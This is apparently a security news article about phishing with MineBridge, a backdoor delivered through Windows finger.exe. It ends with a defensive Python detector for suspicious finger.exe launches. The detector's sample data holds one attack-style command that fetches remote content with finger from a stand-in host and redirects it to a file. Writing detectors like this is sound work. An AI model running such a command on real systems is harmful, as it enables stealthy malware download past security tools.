Hackers run a wide variety of phishing campaigns, and however often these are shut down, they keep finding new approaches. Recently, a new phishing campaign was identified that uses the Windows Finger command to download a malware variant called MineBridge.
The ‘Finger’ command is a utility that originated on Linux and Unix operating systems. It allows local users to retrieve a list of users on a remote machine or information about a particular remote user.
The utility also allows commands to be executed to find out whether a specific user is logged in; however, this is rarely used today. Nowadays, even Windows includes a finger.exe command that performs the same function.
The finger utility has raised security concerns before, because it was abused to find out basic information about users that could be used in social engineering attacks. This time, the problem arose when security researchers found that the finger command can be used as a LOLBin (living-off-the-land binary) to download malware or exfiltrate data without alerting security solutions such as antivirus mechanisms.
FireEye first reported MineBridge malware in December 2019 when they observed some phishing campaigns targeting South Korean financial institutions. The emails were disguised as Word documents containing details of job applicants targeted for specific firms.
The sender also cleverly recommended that the candidate's CV be considered even if there were no current openings. The emails were not only well written but also believable.
When the email is opened, it displays a document stating that it was created using an old version of Windows and that, to view the content, the user needs to ‘enable editing’ and then ‘enable content’. Doing so installs the backdoor via a malicious macro that fetches and downloads a Base64-encoded certificate.
The certificate is a malware downloader that uses DLL hijacking to install the MineBridge backdoor. Once installed, the malware gives full control of the device to the remote threat actor, who will have access to the infected device’s microphone and will be able to listen in and perform other malicious activities.
Interesting, downloads a teamviewer executable and a malicious dll, sideloaded by teamviewer, containing MINEBRIDGE malware – The behaviour is the same, apart from the finger.exe, even the TLD c2 *.top of fireeye report – https://t.co/qKFFlUnA0p https://t.co/4hMJPlAGJg pic.twitter.com/QdIuwbe2Gq
— Giuseppe `N3mes1s` (@gN3mes1s) January 15, 2021
The easiest way to combat these attacks is to deploy advanced spam filtering solutions that block suspicious emails so that they never reach the user’s inbox. Since the Finger command itself is rarely used today, administrators are advised to block the finger.exe command through AppLocker or other methods.
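Where finger.exe cannot be blocked outright, its launches can at least be triaged in process-creation logs. The following Python code is an added example, not taken from the original article or from FireEye's report: it flags every finger.exe launch and raises the severity when an Office application is among its ancestors or the launching shell redirects its output to a file. The field names follow Sysmon Event ID 1; the helper names, severity levels and all sample events are assumptions constructed for illustration.

```python
# Field names follow Sysmon Event ID 1; every sample event below is constructed.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

def exe_name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def ancestors(event, by_guid):
    """Executable names from the parent upwards, guarding against GUID loops."""
    chain, seen = [], set()
    cur = by_guid.get(event["ParentProcessGuid"])
    while cur and cur["ProcessGuid"] not in seen:
        seen.add(cur["ProcessGuid"])
        chain.append(exe_name(cur["Image"]))
        cur = by_guid.get(cur["ParentProcessGuid"])
    return chain

def find_finger_alerts(events):
    """Return one alert per finger.exe launch, raised to 'high' on risky context."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for e in events:
        if exe_name(e["Image"]) != "finger.exe":
            continue
        # The remote form is [user]@host; the client then connects to TCP port 79.
        target = next((a.split("@", 1)[1] for a in e["CommandLine"].split()[1:] if "@" in a), None)
        chain = ancestors(e, by_guid)
        office = next((p for p in chain if p in OFFICE_APPS), None)
        # Redirection is done by the launching shell, so it shows in the parent's command line.
        parent = by_guid.get(e["ParentProcessGuid"])
        redirected = bool(parent) and ">" in parent["CommandLine"]
        alerts.append({"severity": "high" if office or redirected else "medium",
                       "target": target, "office_ancestor": office,
                       "output_redirected": redirected, "ancestors": chain})
    return alerts

def ev(guid, parent, image, cmdline):
    return {"ProcessGuid": guid, "ParentProcessGuid": parent, "Image": image, "CommandLine": cmdline}

SAMPLE_EVENTS = [  # constructed; 198.51.100.7 is a documentation-range address
    ev("g1", "g0", r"C:\Windows\explorer.exe", "explorer.exe"),
    ev("g2", "g1", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "WINWORD.EXE /n cv.doc"),
    ev("g3", "g2", r"C:\Windows\System32\cmd.exe", "cmd.exe /c finger nobody@198.51.100.7 > out.txt"),
    ev("g4", "g3", r"C:\Windows\System32\finger.exe", "finger nobody@198.51.100.7"),
    ev("g5", "g1", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ev("g6", "g5", r"C:\Windows\System32\finger.exe", "finger alice@fileserver01"),
]

if __name__ == "__main__":
    print(*find_finger_alerts(SAMPLE_EVENTS), sep="\n")
```

Walking the ancestor chain matters because a macro normally starts finger.exe through a shell, so the Office application is the grandparent of the process rather than its direct parent.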